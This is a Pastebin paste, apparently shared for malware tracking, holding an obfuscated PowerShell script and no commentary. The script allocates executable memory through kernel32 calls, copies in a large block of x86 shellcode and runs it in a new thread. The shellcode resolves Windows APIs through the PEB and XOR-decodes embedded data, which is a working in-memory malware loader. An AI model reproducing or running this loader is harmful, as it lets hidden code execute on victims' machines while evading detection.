Advertisement
James_inthe_box

PS1

Jan 26th, 2018
336
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.37 KB | None | 0 0
  1. $wwxya = '[DllImport("kernel32.dll")] public static extern UInt32 WaitForSingleObject(IntPtr d, UInt32 e); [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr s, uint t, uint u, uint v); [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr w, uint x, IntPtr y, uint a, IntPtr b, IntPtr c); ';
  2. $bcddefg = Add-Type -passthru -namespace Win32 -memberDefinition $wwxya -Name "_bcddefg" ;
  3. [Byte[]] $lmnoo = @(0xB8,0xE6,0x00,0x00,0x00,0xC1,0xE8,0x02,0xC1,0xE0,0x02,0x8B,0xEC,0x2B,0xE0,0x8B,0xFC,0x8B,0xC8,0x33,0xC0,0xF3,0xAA,0x89,0x2C,0x24,0x8B,0xEC,0xE8,0x00,0x00,0x00,0x00,0x58,0x2D,0x21,0x10,0x40,0x00,0x89,0x85,0xA5,0x00,0x00,0x00,0x8D,0x35,0x47,0x12,0x40,0x00,0x03,0xB5,0xA5,0x00,0x00,0x00,0x8D,0x7D,0x04,0xB9,0xA1,0x00,0x00,0x00,0xF3,0xA4,0x64,0x8B,0x1D,0x30,0x00,0x00,0x00,0x8B,0x5B,0x0C,0x8B,0x5B,0x1C,0x8B,0x5B,0x08,0x8D,0x75,0x04,0x8D,0x7D,0x04,0xB9,0x06,0x00,0x00,0x00,0xAD,0x03,0xC3,0xAB,0xE2,0xFA,0x66,0xC7,0x85,0xDB,0x00,0x00,0x00,0x10,0x00,0x8D,0x95,0xC5,0x00,0x00,0x00,0xC7,0x02,0x61,0x00,0x64,0x00,0xC7,0x42,0x04,0x76,0x00,0x61,0x00,0x66,0xC7,0x85,0xDD,0x00,0x00,0x00,0x12,0x00,0xC7,0x42,0x08,0x70,0x00,0x69,0x00,0xC7,0x42,0x0C,0x33,0x00,0x32,0x00,0x66,0xC7,0x42,0x10,0x00,0x00,0x89,0x95,0xDF,0x00,0x00,0x00,0x8D,0x85,0xBD,0x00,0x00,0x00,0x8D,0x95,0xDB,0x00,0x00,0x00,0x50,0x52,0x6A,0x00,0x6A,0x00,0xFF,0x75,0x18,0x58,0xFF,0xD0,0x85,0xC0,0x0F,0x85,0x80,0x01,0x00,0x00,0x8B,0x9D,0xBD,0x00,0x00,0x00,0xB9,0x02,0x00,0x00,0x00,0xAD,0x03,0xC3,0xAB,0xE2,0xFA,0x8B,0x5D,0x30,0x8D,0x75,0x34,0x8B,0xFE,0xB9,0x60,0x00,0x00,0x00,0xAC,0x32,0xC3,0xAA,0xFE,0xC3,0xE2,0xF8,0x8D,0x85,0xA9,0x00,0x00,0x00,0x8D,0x75,0x34,0x50,0x56,0xFF,0x75,0x28,0xFF,0x75,0x1C,0x58,0xFF,0xD0,0x85,0xC0,0x0F,0x85,0x3E,0x01,0x00,0x00,0x8D,0x85,0xB1,0x00,0x00,0x00,0x8D,0x55,0x2C,0x6A,0x04,0x68,0x00,0x30,0x00,0x00,0x52,0x6A,0x00,0x50,0x6A,0xFF,0xFF,0x75,0x10,0x58,0xFF,0xD0,0x8D,0xB5,0x94,0x00,0x00,0x00,0x8B,0xFE,0xB9,0x11,0x00,0x00,0x00,0xAC,0x32,0xC3,0xAA,0xFE,0xC3,0xE2,0xF8,0x8D,0x45,0x2C,0x8D,0xB5,0x94,0x00,0x00,0x00,0x50,0xFF,0xB5,0xB1,0x00,0x00,0x00,0x6A,0x00,0x6A,0x00,0x56,0xFF,0xB5,0xA9,0x00,0x00,0x00,0xFF,0x75,0x20,0x58,0xFF,0xD0,0x85,0xC0,0x0F,0x85,0xE4,0x00,0x00,0x00,0xFF,0xB5,0xA9,0x00,0x00,0x00,0xFF,0x75,0x14,0x58,0xFF,0xD0,0x8B,0xB5,0xB1,0x00,0x00,0x00,0xAD,0x93,0xAD,0x33,0xC3,0x89,0x85,0xAD,0x00,0x00,0x00,0x50,0xAD,0x33,0xC3,0x89,0x85,0xB5,0x00,0x00,0x00,0x8D,0x85,0xB9,0x00,0x00,0x00,0x8D,0x95,0xAD,0x00,0x00,0x00,0x6A,0x04,0x68,0x00,0x30,0x00,0x00,0x52,0x6A,0x00,0x50,0x6A,0xFF,0xFF,0x75,0x10,0x58,0xFF,0xD0,0x58,0x8B,0xBD,0xB9,0x00,0x00,0x00,0x33,0xD2,0xB9,0x04,0x00,0x00,0x00,0xF7,0xF1,0x91,0xAD,0x33,0xC3,0x43,0xAB,0xE2,0xF9,0x85,0xD2,0x74,0x09,0x87,0xCA,0xAC,0x32,0xC3,0x43,0xAA,0xE2,0xF9,0x8B,0x85,0xAD,0x00,0x00,0x00,0xC1,0xE0,0x03,0x89,0x85,0xC1,0x00,0x00,0x00,0x6A,0x00,0x6A,0x00,0xFF,0xB5,0xC1,0x00,0x00,0x00,0x6A,0x00,0x6A,0x00,0x68,0x02,0x00,0x04,0x00,0xFF,0x75,0x08,0x58,0xFF,0xD0,0xFF,0xB5,0xC1,0x00,0x00,0x00,0x6A,0x08,0x50,0xFF,0x75,0x04,0x58,0xFF,0xD0,0x89,0x85,0xBD,0x00,0x00,0x00,0x8D,0x85,0xC1,0x00,0x00,0x00,0x50,0xFF,0xB5,0xAD,0x00,0x00,0x00,0xFF,0xB5,0xB9,0x00,0x00,0x00,0xFF,0xB5,0xC1,0x00,0x00,0x00,0xFF,0xB5,0xBD,0x00,0x00,0x00,0x68,0x02,0x01,0x00,0x00,0xFF,0x75,0x0C,0x58,0xFF,0xD0,0x85,0xC0,0x75,0x0E,0x8B,0x85,0xBD,0x00,0x00,0x00,0x03,0x85,0xB5,0x00,0x00,0x00,0xFF,0xD0,0x8B,0x65,0x00,0xC3,0xD6,0x2D,0x05,0x00,0x3E,0x29,0x06,0x00,0x7D,0x53,0x0B,0x00,0xD8,0x52,0x04,0x00,0xC8,0x54,0x04,0x00,0xB8,0x22,0x06,0x00,0x15,0xCC,0x00,0x00,0xEF,0x48,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x80,0x04,0xE0,0x00,0x00,0x35,0x00,0x00,0x00,0x66,0x79,0x71,0x6C,0x6E,0x7B,0x69,0x79,0x61,0x73,0x56,0x23,0x33,0x2D,0x30,0x2B,0x23,0x32,0x1B,0x1F,0x20,0x24,0x2F,0x23,0x3A,0x3D,0x13,0x13,0x24,0x20,0x21,0x31,0x3B,0x22,0x01,0x3D,0x2B,0x29,0x32,0x33,0x33,0x02,0x1A,0x18,0x11,0x0E,0x0C,0x16,0x00,0x14,0x3B,0x2B,0x25,0x39,0x22,0x28,0x31,0x15,0x5F,0x44,0x47,0x46,0x41,0x4C,0x34,0x46,0x5A,0x3D,0x3B,0x43,0x4A,0x51,0x3C,0x3F,0x47,0xB2,0xAC,0xB4,0xC7,0xC2,0xB6,0xAB,0xC1,0xCE,0xBB,0xCC,0xB9,0xCF,0xC8,0xBA,0xCA,0xD6,0xD5,0xA7,0xEE,0x94,0xA4,0xD7,0xA6,0xAF,0xA1,0xA2,0xDA,0xA4,0xD9,0xAB,0xA8,0xE3,0x96,0xE7,0x90,0x95,0xA5,0x00);
  4. $pqrstuv = 161 + 584;
  5. $hijkllmno = $bcddefg::VirtualAlloc( 0, $pqrstuv, 0x3000, 0x40);
  6. [System.Runtime.InteropServices.Marshal]::copy( $lmnoo, 0, $hijkllmno, $pqrstuv);
  7. $hijkllmno = $bcddefg::CreateThread( 0, 0, $hijkllmno, 0, 0, 0);
  8. $bcddefg::WaitForSingleObject( $hijkllmno, 60000);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement